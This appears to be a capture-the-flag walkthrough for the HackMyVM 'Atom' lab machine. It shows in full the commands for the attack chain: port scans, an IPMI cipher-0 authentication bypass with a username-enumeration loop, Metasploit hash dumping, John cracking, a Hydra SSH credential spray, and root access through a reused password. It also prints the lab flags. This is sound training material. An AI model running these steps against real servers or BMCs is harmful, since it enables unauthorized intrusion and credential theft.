HackMyVM | Atom

In this walkthrough, I demonstrate how I obtained complete ownership of Atom from HackMyVM
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge

Nmap Results

ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

TCP Scan

# Nmap 7.94SVN scan initiated Fri Aug 16 14:34:24 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.11
Nmap scan report for 10.9.9.11
Host is up (0.00047s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 16 14:34:26 2024 -- 1 IP address (1 host up) scanned in 1.81 seconds
ℹ️
Since only tcp/22 is open, I'm going to try a UDP scan as well. SSH is almost never the first way into a box.

UDP Scan

# Nmap 7.94SVN scan initiated Fri Aug 16 14:34:32 2024 as: nmap -Pn --top-ports 300 -sU -T4 -oN udp-nmap-scan.txt 10.9.9.11
Warning: 10.9.9.11 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.9.9.11
Host is up (0.00080s latency).
Not shown: 283 closed udp ports (port-unreach)
PORT      STATE         SERVICE
623/udp   open          asf-rmcp

# Nmap done at Fri Aug 16 14:39:31 2024 -- 1 IP address (1 host up) scanned in 299.34 seconds





Service Enumeration

UDP/623

623/UDP/TCP - IPMI | HackTricks
IPMI Vulnerabilities

In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through cipher type 0. This vulnerability, documented in detail at Dan Farmer's research, enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations.

Testing IPMI

We have IPMI version 2.0 😈
Cipher 0 is valid
💡
Again, we can authenticate to the IPMI server with any password given that a username is valid
for name in $(cat /usr/share/seclists/Usernames/top-usernames-shortlist.txt); do \
ipmitool -I lanplus -C 0 -H 10.9.9.11 -U $name -P thisisnotthepassword user list > /dev/null 2>&1 && echo "Valid username found: ${name}"
done

Quick bash script to test for valid usernames with a small list at first. The && indicates that the echo command will only run as long as the ipmitool command does not produce an error.

Valid username found: admin



Pulling Info from IPMI

ipmitool -I lanplus -C 0 -H 10.9.9.11 -U admin -P thisisnotthepassword user list 

Usernames from IPMI

ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      Unknown (0x00)
2   admin            true    false      true       ADMINISTRATOR
3   analiese         true    false      true       USER
4   briella          true    false      true       USER
5   richardson       true    false      true       USER
6   carsten          true    false      true       USER
7   sibylle          true    false      true       USER
8   wai-ching        true    false      true       USER
9   jerrilee         true    false      true       USER
10  glynn            true    false      true       USER
11  asia             true    false      true       USER
12  zaylen           true    false      true       USER
13  fabien           true    false      true       USER
14  merola           true    false      true       USER
15  jem              true    false      true       USER
16  riyaz            true    false      true       USER
17  laten            true    false      true       USER
18  cati             true    false      true       USER
19  rozalia          true    false      true       USER
20  palmer           true    false      true       USER
21  onida            true    false      true       USER
22  terra            true    false      true       USER
23  ranga            true    false      true       USER
24  harrie           true    false      true       USER
25  pauly            true    false      true       USER
26  els              true    false      true       USER
27  bqb              true    false      true       USER
28  karlotte         true    false      true       USER
29  zali             true    false      true       USER
30  ende             true    false      true       USER
31  stacey           true    false      true       USER
32  shirin           true    false      true       USER
33  kaki             true    false      true       USER
34  saman            true    false      true       USER
35  kalie            true    false      true       USER
36  deshawn          true    false      true       USER
37  mayeul           true    false      true       USER
38                   true    false      false      Unknown (0x00)
39                   true    false      false      Unknown (0x00)
40                   true    false      false      Unknown (0x00)
41                   true    false      false      Unknown (0x00)
42                   true    false      false      Unknown (0x00)
43                   true    false      false      Unknown (0x00)
44                   true    false      false      Unknown (0x00)
45                   true    false      false      Unknown (0x00)
46                   true    false      false      Unknown (0x00)
47                   true    false      false      Unknown (0x00)
48                   true    false      false      Unknown (0x00)
49                   true    false      false      Unknown (0x00)
50                   true    false      false      Unknown (0x00)
51                   true    false      false      Unknown (0x00)
52                   true    false      false      Unknown (0x00)
53                   true    false      false      Unknown (0x00)
54                   true    false      false      Unknown (0x00)
55                   true    false      false      Unknown (0x00)
56                   true    false      false      Unknown (0x00)
57                   true    false      false      Unknown (0x00)
58                   true    false      false      Unknown (0x00)
59                   true    false      false      Unknown (0x00)
60                   true    false      false      Unknown (0x00)
61                   true    false      false      Unknown (0x00)
62                   true    false      false      Unknown (0x00)
63                   true    false      false      Unknown (0x00)
ipmitool -I lanplus -C 0 -H 10.9.9.11 -U admin -P thisisnotthepassword user list | grep '^[0-9]' | cut -d ' ' -f 3 | grep -v '^$' > usernames.txt

Generate a list of users and save in usernames.txt



Pulling Hashes from IPMI

sudo msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 10.9.9.11
set USERS_FILE usernames.txt
set OUTPUT_JOHN_FILE /home/ben/Pentest/Training/HackMyVM/Atom/hash
run
john --wordlist=rockyou.txt hash
john --show hash | grep ':' | cut -d ' ' -f 2 > creds.txt

Create a credential file for use with SSH testing



TCP/22

hydra -I -v -C creds.txt ssh://10.9.9.11





Exploit

IPMI Protocol and Weak Passwords

The IPMI server running on the target is using a vulnerable IPMI version that allows the user to authenticate as any valid user on the target with no requirements for a valid password. We are then able to authenticate to the IPMI server, dump hashes, and crack any that are found in a word list.

ssh onida@10.9.9.11





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
    
Linux atom 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64 GNU/Linux

Current User

uid=1000(onida) gid=1000(onida) groups=1000(onida),100(users)
    
sudo command not found



Users and Groups

Local Users

onida:x:1000:1000:,,,:/home/onida:/bin/bash

Local Groups

users:x:100:onida
onida:x:1000:  



Network Configurations

Network Interfaces

2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether bc:24:11:6e:ab:9b brd ff:ff:ff:ff:ff:ff
    altname enp0s18
    inet 10.9.9.11/24 brd 10.9.9.255 scope global dynamic noprefixroute ens18
       valid_lft 6279sec preferred_lft 6279sec
    inet6 fe80::889f:b1c2:3dfc:3d93/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:48:1f:93:dd brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:48ff:fe1f:93dd/64 scope link 
       valid_lft forever preferred_lft forever   

Open Ports

tcp   LISTEN 0      4096         127.0.0.1:43749      0.0.0.0:*           
tcp   LISTEN 0      511          127.0.0.1:80         0.0.0.0:*   



Interesting Files

/var/www/html/atom-2400-database.db

sqlite3 /var/www/html/atom-2400-database.db
sqlite3> .tables
select * from users;
1|atom|$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm





Privilege Escalation

Cracking the User Hash



Becoming Root

💡
There is no atom user on the box when checking /etc/passwd, so let's see if this password is also re-used for root
su root
The password is, indeed, re-used for root



Flags

User

f75390001fa2fe806b4e3f1e5dadeb2b   

Root

d3a4fd660f1af5a7e3c2f17314f4a962   
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.